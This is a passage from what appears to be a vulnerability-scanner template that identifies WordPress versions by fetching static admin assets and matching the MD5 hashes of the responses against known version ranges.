"{{BaseURL}}/wp-admin/js/theme-preview.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" - - type: dsl - name: 3.0 - 3.3.3 - dsl: - - "(\"842531d9bc70b047e9a413b91f66cd96\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"1594334801bab2aa5bbcac672d855780\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/utils.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"eb27f928ad4bdb39c07e2ff3eed95cbb\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"ff272859f10cd239e8e27cae422b6656\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-fields.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"06cb5141c3ac8e8abdfa887560fc9fc0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.dev.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"d731591839cfd06e33776617be599982\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/plugin-install.dev.js" - matchers: - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"45050658679cde23b3e31be7de31e526\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"1217773a91b7c15facf17f08c6366eb6\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"7cd872829eeaeee63270591b89d50ce9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-background.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"56f69a07423e2580219a8d54612099fb\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"18c3b57b631f56a0dcb63f0fe5f10305\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"62230d261801142f30d52e1dc6969d28\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"72c8235ff0eea718edafee3dea558f31\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/utils.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"549df3fa634602b63688d98547c6f452\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"e102613271d205d357aa317ee6c8f32b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/nav-menu.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"bfbdd5233cbb89378be6c44001491b31\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"317255427d2538b776ef410cf01bab1c\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"ca4ec46d0208dae54597f758e1085ed7\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"4d4d1c740d3332af7e2a8ba23eba439d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/swfupload-all.js" - matchers: - - type: dsl - name: 3.2 - 3.5.1 - dsl: - - "(\"baa556317b44bc0dd82864676833540f\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"8c132780860b2d20c1837c6e05869393\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/about-color-picker.png" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"08b02c06a5d28b21f81069ad51963592\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/about-retina.png" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"fd063343a877ac481220c41e49ee8f4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/about-media.png" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"5b3063ef865b732f9fde36bfa7d26f3f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/about-twenty-twelve.png" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e9bbcb3c6459eab990f96fad803359c5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.min.js" - matchers: - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/cat.js" - matchers: - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7060f71460529e6377416bb39ae61408\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"8a0487d34029c6621081f5a89d91a82d\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"fbf652a8b7d8ec28b85d3398d36099aa\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"6942a4d0bc06b51ae402ec77f08bae0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/cat.min.js" - matchers: - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"6e76c426994895bb6e9a574fe3b01048\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpmini-blue-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpmini-blue.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"46b52530984eff532be3372596c66386\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/tb-close.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"19efae1b275c9c70a783799e259e059e\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"7c088dbddefa7aff7a860580a98f3e30\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/tb-close-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"ae65a3a2de0cb24ecef3065a1618fdac\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif" - matchers: - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/page_bug.gif" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"ea31916969e5255f353febf4b9b55a38\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/press-this-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"8be606bebfbff936f7d6ac3927be1337\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-pr-2x.png" - matchers: - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"b008e43aab25a6a2cd4ef2f0a5c4bfba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/stars-rtl.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a3c107d957897a323b9801eb7a0479ad\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7dcc04a095e8470670d74e0de8c7bd1a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-dark-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"bc97d62061c943dd6ff71d964c7d8425\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wordpress-logo-2x.png" - matchers: - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"784aa9fed2f19f1607cae85205507163\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-pr.png" - matchers: - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"df60fed3e762a0b86903b629f90ffd79\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/press-this.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"beef1f704b00931544c0ddb07933c498\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e738cdc2da9198b7af77ba33fbb752a8\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"770f9ca889019ef90fae6b92307844b1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-vs.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"7d5abe2a367e42e87482743521166c1f\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"da70ee9298cc0b46e14af7221b8f47cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-dark-vs.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a7bd090aa6d1cd54ec9f2a9ccc1043db\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"7bb6c8eefdfb40b73cefc66b3d89bd5a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/about-updates-2x.png" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c041e28a6ea33aa206cf9b43c3b1f428\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-vs-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"550a69654948fc739ae5f9a537106cb4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-dark-vs-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"bf96d253f8dfcad84f9d649de07dd797\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo-vs-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"13e7ab1ac2f6c77f177c849576bfdf31\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-badge.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"73b244635671611458e874a20707135d\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"1912d3a313bc7f8f75af486578bf62b1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl-2x.gif" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"507ddcae331a55002d8e006a8ea0504c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/stars-rtl-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"6ec2333cc32894b25402a1d21924a6c9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/welcome-icons.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"ebbeff45f2fee9bef30233451be6c87f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"e0c1cc94af35c8b495e35e9e6fbdad05\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/arrows-dark.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"8b77c74d3b2eec1f50bb59ae34bdb5ff\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"656e3c3b11412ae5c595f1bda2bd8a99\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-badge-2x.png" - matchers: - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"958efa9f64653d25a424ad21cd16dac1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/about-globe-2x.png" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"3003678c6ccc6f4c874f01e58dee454b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/about-search-2x.png" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"ae40cbce246b6f3ea4d95b05939a92d6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/welcome-icons-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"520a173799e42122f793bed6c3c8fd64\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"7052395c86de7a8a3c2328e7d134680d\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"3ead5afa19537170bb980924397b70d6\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"f83458e18cccab400294d6c0643a51cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-shadow-rtl.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"6238d00c97d2f2fb553405d2cbd800b5\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"4d835884b29a5a91e4bb9fe1b1ba7e01\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo-vs.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"e8d9359697813d9df251808ec4b58b71\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"46b52530984eff532be3372596c66386\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"8fc9d821d334b9534cb9b1b66a18498d\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"331b0948ff75aa7e7f336387572029aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/bubble_bg-rtl.gif" - matchers: - - type: dsl - name: 2.7 - 3.7.35 - dsl: - - "(\"0acb13b5fb21466f3984a5a3bdfc3869\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-shadow.png" - matchers: - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"91c68df0c5f4d4b84de19f51dbe4f3b7\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"7197be58fb0b972896f588341f400f4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-classic.min.css" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"ee2d3f9b681056eb0c8c1a1703c110b2\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"6f75a7097c3ebc035d87ade4762f1800\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"02bd813359a3beef07d99f5f14b2a5c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-fresh.min.css" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"e67f2d5d990caf64736f32b9ca54a950\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"135ed0d18597afe32bbfaf21c20e8587\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"3f14edb51035e43f31b24e8a3cf2552c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/about.js" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"753ddfb43ade0f3fb4c00b010bdeec60\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/about.min.js" - matchers: - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"5644f43ee3e5a30fdcd478cd44c698f5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.js" - matchers: - - type: dsl - name: 3.6 - 3.8.13 - dsl: - - "(\"4f9797db7014eb90511683e54dd80318\" == md5(body))" - - type: dsl - name: 3.7.14 - 3.8.35 - dsl: - - "(\"7bc0ee636b3b83484fc3b9348863bd22\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5.2 - dsl: - - "(\"4c84570d1147590363953bd6c694966b\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"37b53904bf82e18d1fc0c92434617684\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/changelog.txt" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"01928d3405b7c4b0d5f82e1c8e1b4ac1\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"15bab07382420b0fd20cdbf308cad0cc\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"ca2c3fb188295605bfabaaef64114554\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"ce86f17aad09c14569675f27a8ee304a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.html5.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3fbc939309e4ab58452cd744892ab575\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"3229c9876dd8f4f2f2d6ec090e57fb13\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"ec192acff96dee19dd49e52d43f6240e\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"836d773c9e8efc8c15f6168bfcd08700\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"56cb2a0e7a1e792a1a803aa3a527d7d6\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"20ff795950f0ef3b5115682db8f4111e\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"4152d57d9dcf7ea975bb05043e53a83e\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"e39810e51490907d70cb724175e27a7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.html4.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"5f70abca09e28bbde851a604ebd9e76f\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5.2 - dsl: - - "(\"851cc71705ebc4c9731a6673e3dfc3cf\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"734fe87262125790dd0e51428322bc73\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/dialog.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"2512108fca85f5d904ee6e0042180c85\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"43382eca508513e60da47f8becb0e1fd\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"3c9238e8e6e13af9fcbcf099335d17ee\" == md5(body))" - - type: dsl - name: 2.8 - 3.2.1 - dsl: - - "(\"9c93f6a41d7c635d738dd6796536a7c3\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"d490a91bd83042db45637b7147382f8d\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"46a1fb44a7971c5f203ebb8109ae4e3b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/embedded.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"1fc0d1771755f5ce441c1dd278b3a495\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/tabs.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1601cf739eb25c25208344cf3b28ab71\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"87cb768e68c38f31ff91a0921d4ea0d8\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"fbcde0be231a69f57bf2ef8515a75b09\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"2325f2bd490235cde0e08d3000d2fd02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery-2x.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"406ccfcbc06224cb89a5c524cf4bc69a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-more-2x.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"049ab5d6aec48ea7cd8a380e4785c096\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/mce-nextpage-2x.png" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"4a6f3e665911a3a0c081414a6227e5fb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/dialog.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"0ceb1bc740c467971507606441d36d7c\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"56b99f4e744b576fc0b79da0a997f328\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"61f260cc574683934afbb0af6917179c\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"2c50db59d058317010775677fee63ac3\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"950b230e8c783672e82dd1f4977d6df3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/items.gif" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"d201498a710fc8aac6e117820b9814b7\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_arrow.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"e21752451a9d80e276fef7b602bdbdba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_check.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"c7d003885737f94768eecae49dcbca63\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/tabs.gif" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"6473bbcd0a011e9fcdd9f777ef437410\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"93f97588a35da1f45fdcb975d4380913\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/progress.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"50c5e3e79b276c92df6cc52caeb464f0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/img/buttons.png" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"33b2f2e08cc3ade5254fec64c4183558\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"1e0acdc2135897e6a95bb40cfde2fbc6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/dialog.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"b66af30667a23ece1521fe354331c534\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"b8df654e244dce02616deee320db0a88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/content.css" - matchers: - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"581e2436d2cafd2141f4a75657e06245\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"afd85a39de6c920b04b88d4a04b83938\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"719a5228674fb83e322f29efa90b950e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ui.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"8beb8f4a330b1294c488f435873328ef\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"cd943049a33bbda3d7c53c16c3b644cc\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"68151de213c5a93151398138c4c88ef3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_silver.css" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"f66b026fe40921b62c0b77798876760a\" == md5(body))" - - type: dsl - name: 2.7 - 3.1.4 - dsl: - - "(\"623a420867f1da38168b5ab0eac1afcc\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"7b4e376df8959facda1645ab2853aec4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/dialog.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"084f7ce623cd2965a01f65c763f88eab\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"b6ccc7c5502dae22838aa47a0e2267a0\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"da587a5b75a903f0ab0bb5037dbb3395\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"55252ba2c0ed8e6cf62e28e111cb3b4d\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"32d8369bcd5f49067b6c0905b2bb6971\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"7c44580a01044be04ef075f9f28c99d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_silver.png" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"15fbf2b4a20dbaa86205af6764f4fee4\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"5690ef573f4dc74ec3eb4d101806976e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_black.png" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"9645f90b37102a3618a52be18b74b02b\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"a5ad448e9c25120cb7e05fffe4a6234f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg.png" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"36fd9fbd748860f515df259443367163\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - 